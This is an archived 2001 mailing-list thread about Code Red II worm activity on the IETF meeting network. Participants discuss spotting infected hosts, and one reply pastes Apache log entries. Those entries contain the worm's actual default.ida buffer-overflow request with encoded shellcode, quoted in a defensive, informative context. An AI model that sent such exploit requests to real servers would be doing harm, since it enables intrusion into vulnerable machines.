Re: Code Red II at the IETF meeting

--On 08/07/2001 9:21 AM -0400 Bobby Krupczak 
<rdk(_at_)cc(_dot_)gatech(_dot_)edu> wrote:

Well, folks, my packet suckers have shown a Code Red II attack from a 
machine on the IETF meeting net.  It's 217.33.140.38 -- if you have 
that address, you need to disinfect and patch your machine.  For the 
rest of you, be careful...


Do you always snoop on traffic at IETFs?

Just curious.  Dont read anything else into my question.


You don't have to snoop. Just run a webserver on port 80 on your local host
and look at the virus trying to attack your local laptop.

I run a local apache, and the logs are full of things like these:

217.33.136.83 - - [07/Aug/2001:14:32:44 +0100] "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc
bd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0" 404 271
217.33.24.50 - - [07/Aug/2001:14:36:21 +0100] "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc
bd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0" 404 271

     paf